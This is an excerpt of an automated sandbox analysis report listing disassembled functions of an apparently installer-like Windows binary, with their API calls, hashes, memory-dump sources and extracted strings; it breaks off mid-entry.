                                                                                                                                                                        • Opcode Fuzzy Hash: 8c93d3ffb126bffe134411186b134cafb9611119a3d59e34e735d07eaf6de90c
                                                                                                                                                                        • Instruction Fuzzy Hash: 5632F170600602AFDB14DF6CC889BAAF7F5FF50314F148AAAE415DB391EB729944CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC5580 Relevance: 22.9, APIs: 15, Instructions: 389memorynativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BC5A10: EnterCriticalSection.KERNEL32(00E9E7BC,1FC3D414,00000000,?,?,?,?,?,?,00BC523E,00DAB23D,000000FF), ref: 00BC5A4D
                                                                                                                                                                          • Part of subcall function 00BC5A10: LoadCursorW.USER32(00000000,00007F00), ref: 00BC5AC8
                                                                                                                                                                          • Part of subcall function 00BC5A10: LoadCursorW.USER32(00000000,00007F00), ref: 00BC5B6E
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC5623
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00BC5654
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00BC572B
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00BC573B
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BC5746
                                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,00000001,?), ref: 00BC5754
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00BC5762
                                                                                                                                                                        • SetWindowTextW.USER32(?,00E1329C), ref: 00BC5801
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00BC5836
                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00BC5844
                                                                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00BC5898
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00BC5923
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC593C
                                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,00000000), ref: 00BC5983
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC59A2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long$String$FreeGlobal$AllocCursorLoadNtdllProc_$CriticalEnterLockSectionTextUnlock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4180125975-0
                                                                                                                                                                        • Opcode ID: 9f33d05fa7356c0341f0dc2e2032be8f0e638c01df550e1a83d61bc2f38b5a8d
                                                                                                                                                                        • Instruction ID: f7dcbaffbe55a96756e2834e65eb3437d15bf7db2a04b4532e105af8912f47da
                                                                                                                                                                        • Opcode Fuzzy Hash: 9f33d05fa7356c0341f0dc2e2032be8f0e638c01df550e1a83d61bc2f38b5a8d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7ED1D071900609EFDB20DFA5CC48FAEBBF8EF45320F1441ADE811A7291DB75A944CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BCF420 Relevance: 21.6, APIs: 14, Instructions: 611COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00BCF4D3
                                                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00BCF4F2
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00BCF500
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00BCF517
                                                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00BCF538
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB,?), ref: 00BCF54F
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                        • ShowWindow.USER32(?,?), ref: 00BCF68D
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00BCF6BC
                                                                                                                                                                        • ShowWindow.USER32(?,?), ref: 00BCF6D9
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00BCF6FE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$LongShow$Rect$AllocHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3066103627-0
                                                                                                                                                                        • Opcode ID: 37b463daddcfe9efd171ef29f7ad0515d17845667b60c4f5efe4badf9ba4cd3a
                                                                                                                                                                        • Instruction ID: f434a12fcd46439aa5e481d82b59539e00e5b607d9788441d3c9fc7220b6f27e
                                                                                                                                                                        • Opcode Fuzzy Hash: 37b463daddcfe9efd171ef29f7ad0515d17845667b60c4f5efe4badf9ba4cd3a
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C422971A042099FCB14CFA9D884BAEBBF6FF48304F1485AEE499A7261D730A945CF51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CDAB40 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 420fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 00CDAEE2
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00CDAF10
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00CDAF99
                                                                                                                                                                        Strings
                                                                                                                                                                        • Not selected for install., xrefs: 00CDB4B3
                                                                                                                                                                        • No acceptable version found. Operating System not supported., xrefs: 00CDB49E
                                                                                                                                                                        • No acceptable version found. It must be downloaded manually from a site., xrefs: 00CDB497
                                                                                                                                                                        • An acceptable version was found., xrefs: 00CDB482
                                                                                                                                                                        • No acceptable version found. It is already downloaded and it will be installed., xrefs: 00CDB4A5
                                                                                                                                                                        • No acceptable version found., xrefs: 00CDB4AC
                                                                                                                                                                        • No acceptable version found. It must be downloaded., xrefs: 00CDB490
                                                                                                                                                                        • No acceptable version found. It must be installed from package., xrefs: 00CDB489
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$CloseInit_thread_footer$FileFirstHeapProcess
                                                                                                                                                                        • String ID: An acceptable version was found.$No acceptable version found.$No acceptable version found. It is already downloaded and it will be installed.$No acceptable version found. It must be downloaded manually from a site.$No acceptable version found. It must be downloaded.$No acceptable version found. It must be installed from package.$No acceptable version found. Operating System not supported.$Not selected for install.
                                                                                                                                                                        • API String ID: 544434140-749633484
                                                                                                                                                                        • Opcode ID: c9a1ab769af9a96bb7e0d566c6fe2c5c9b4ea465ffbea32b2ed8bff3318d0c96
                                                                                                                                                                        • Instruction ID: ee77274e0a8aca03dee74b0d558431d4aaab8db52763682324aab7393801a04a
                                                                                                                                                                        • Opcode Fuzzy Hash: c9a1ab769af9a96bb7e0d566c6fe2c5c9b4ea465ffbea32b2ed8bff3318d0c96
                                                                                                                                                                        • Instruction Fuzzy Hash: C2F18E70900609CFDB50DF68C9887AEFBF1EF85310F148299D5699B392DB349E45CB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CDEAF0 Relevance: 19.1, APIs: 2, Strings: 8, Instructions: 1604fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                          • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,00000000,00000000), ref: 00CDF078
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?), ref: 00CDF579
                                                                                                                                                                          • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,00000000,?,00000000,00DB225D,000000FF,?,80004005,?,?), ref: 00CB6288
                                                                                                                                                                          • Part of subcall function 00CB6270: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,80004005,?,?,?,00000000,00DE48ED,000000FF,?,00CB4B55), ref: 00CB62BA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharCopyFileHeapInit_thread_footerMultiWide$AllocFindProcessResource
                                                                                                                                                                        • String ID: AI_PRODUCTNAME_ARP$InstanceId$ProductCode$ProductName$\\?\$instname-custom.mst$instname-target.msi${%0.8X-%0.4X-%0.4X-%0.2X%0.2X-%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X}
                                                                                                                                                                        • API String ID: 1546577494-2893908338
                                                                                                                                                                        • Opcode ID: c4455b7aeb7dd2d6346b954dc62c9ae7e316bdb012c423e66230a666c2feb65a
                                                                                                                                                                        • Instruction ID: f3d37b00e93971f1b72e77a8b719c458eb05aa63a591f4b772c120d195e1d969
                                                                                                                                                                        • Opcode Fuzzy Hash: c4455b7aeb7dd2d6346b954dc62c9ae7e316bdb012c423e66230a666c2feb65a
                                                                                                                                                                        • Instruction Fuzzy Hash: 0ED2C0709006499FDB00DFA8C844BAEBBF4FF45314F1481AEE515AB392DB749E05CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDE230 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 639windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00BDE311
                                                                                                                                                                          • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
                                                                                                                                                                          • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00BDE2CE
                                                                                                                                                                          • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
                                                                                                                                                                          • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
                                                                                                                                                                          • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00BDE832
                                                                                                                                                                        • SendMessageW.USER32(?,0000102B,?,0000000F), ref: 00BDE8E0
                                                                                                                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 00BDE981
                                                                                                                                                                          • Part of subcall function 00CC2170: __cftof.LIBCMT ref: 00CC21C0
                                                                                                                                                                        • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00BDEB09
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake__cftof
                                                                                                                                                                        • String ID: AiFeatIco$Icon$d$d
                                                                                                                                                                        • API String ID: 2303580663-2874926508
                                                                                                                                                                        • Opcode ID: cfd4313082bbefcb4420050da2a86bfdc54e6dfc1fb50453e3a2be1ef12d0e38
                                                                                                                                                                        • Instruction ID: 987599ba5a4227c3b942bc641e6023f204426da7dce3afaafbcc0dcae33587e0
                                                                                                                                                                        • Opcode Fuzzy Hash: cfd4313082bbefcb4420050da2a86bfdc54e6dfc1fb50453e3a2be1ef12d0e38
                                                                                                                                                                        • Instruction Fuzzy Hash: D6525771900658DFDB24DB68CC88BEDBBF5AB49304F1441DAE459AB391EB70AE84CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD29A0 Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 581COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CD2B4D
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CD2CEC
                                                                                                                                                                          • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
                                                                                                                                                                          • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,?,1FC3D414,?,?), ref: 00CD2D74
                                                                                                                                                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 00CD2D7B
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 00CD2D8F
                                                                                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00CD2D96
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,?,00000000,00E15F2C,00000002,?,?), ref: 00CD2E25
                                                                                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00CD2E2C
                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00CD30BC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleHandle$AttributeCriticalInit_thread_footerSectionText$BufferEnterInfoLeaveScreenWindow
                                                                                                                                                                        • String ID: Error
                                                                                                                                                                        • API String ID: 2811146417-2619118453
                                                                                                                                                                        • Opcode ID: bef0c7cedae2598316e9ffb1afa09bbc626b68ca409ed7d3bac7d7858b85a47c
                                                                                                                                                                        • Instruction ID: 3186c542de3fef0e51cf88b704a285faf20f2a2f8579999cba2d225ab7c2ff83
                                                                                                                                                                        • Opcode Fuzzy Hash: bef0c7cedae2598316e9ffb1afa09bbc626b68ca409ed7d3bac7d7858b85a47c
                                                                                                                                                                        • Instruction Fuzzy Hash: 26428D71D00259CFDB20DFA8CC45BADBBB0BF55314F24829AE119B7291DB746A89CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D66840 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 197libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?), ref: 00D6686D
                                                                                                                                                                        • GetProcessAffinityMask.KERNEL32 ref: 00D66874
                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 00D668F5
                                                                                                                                                                        • GetModuleHandleA.KERNEL32 ref: 00D66944
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00D6694B
                                                                                                                                                                        • GlobalMemoryStatus.KERNEL32 ref: 00D6699B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$AddressAffinityCurrentGlobalHandleInfoMaskMemoryModuleProcStatusSystem
                                                                                                                                                                        • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                        • API String ID: 3120231856-802862622
                                                                                                                                                                        • Opcode ID: d3cd6be8cf990d470feda16804432e8afdc5173eaf2a789fc1a1d16ed4db917c
                                                                                                                                                                        • Instruction ID: 924047e6357560c97e10432d3cf7cba62e32a770d0778544e945bdca40f6403e
                                                                                                                                                                        • Opcode Fuzzy Hash: d3cd6be8cf990d470feda16804432e8afdc5173eaf2a789fc1a1d16ed4db917c
                                                                                                                                                                        • Instruction Fuzzy Hash: CC718CB2A083118FD708CF69D89475BBBE5BBC8314F09892DE899C7351D7B4D908CB96
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD9650 Relevance: 17.0, Strings: 13, Instructions: 770COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $AI_DynInstances$AI_GenNewCompGuids$AI_MajorUpgrades$InstanceId$Manufacturer$OldProductCode$ProductCode$ProductVersion$UpgradeCode$Xd$Xd$Xd
                                                                                                                                                                        • API String ID: 0-1684879038
                                                                                                                                                                        • Opcode ID: 0a41049ecfa1ab99c84cc92774afb373f1b89145f080cd52a94b0c87d9e41929
                                                                                                                                                                        • Instruction ID: 1dd5e81e184bd4bbfa09ecfa1439c4387d5708b246ce1a62f9d8b657da2abd81
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a41049ecfa1ab99c84cc92774afb373f1b89145f080cd52a94b0c87d9e41929
                                                                                                                                                                        • Instruction Fuzzy Hash: 0162B031D00258DBDB14CB68CC54BEEBBB5EF55304F2482DAE406B7391EB746A85CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC4E60 Relevance: 16.9, APIs: 11, Instructions: 416nativememoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00BC508B
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00BC509B
                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 00BC50A6
                                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(00000000,00000000,00000001,?), ref: 00BC50B4
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EB), ref: 00BC50C2
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,00E1329C), ref: 00BC5161
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00BC5196
                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00BC51A4
                                                                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00BC51F8
                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BC525D
                                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(00000000,00000000,1FC3D414,00000000), ref: 00BC52AF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long$Global$NtdllProc_$AllocLockTextUnlock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3555041256-0
                                                                                                                                                                        • Opcode ID: 5c3f8e204cc326aa710b15330969429212a1f401a9b437fb3f9a2b2027b9ea8f
                                                                                                                                                                        • Instruction ID: 4ab746c58e65b6cf539ed1569bc71c14f6a847af3f231c9ebe61abd937014250
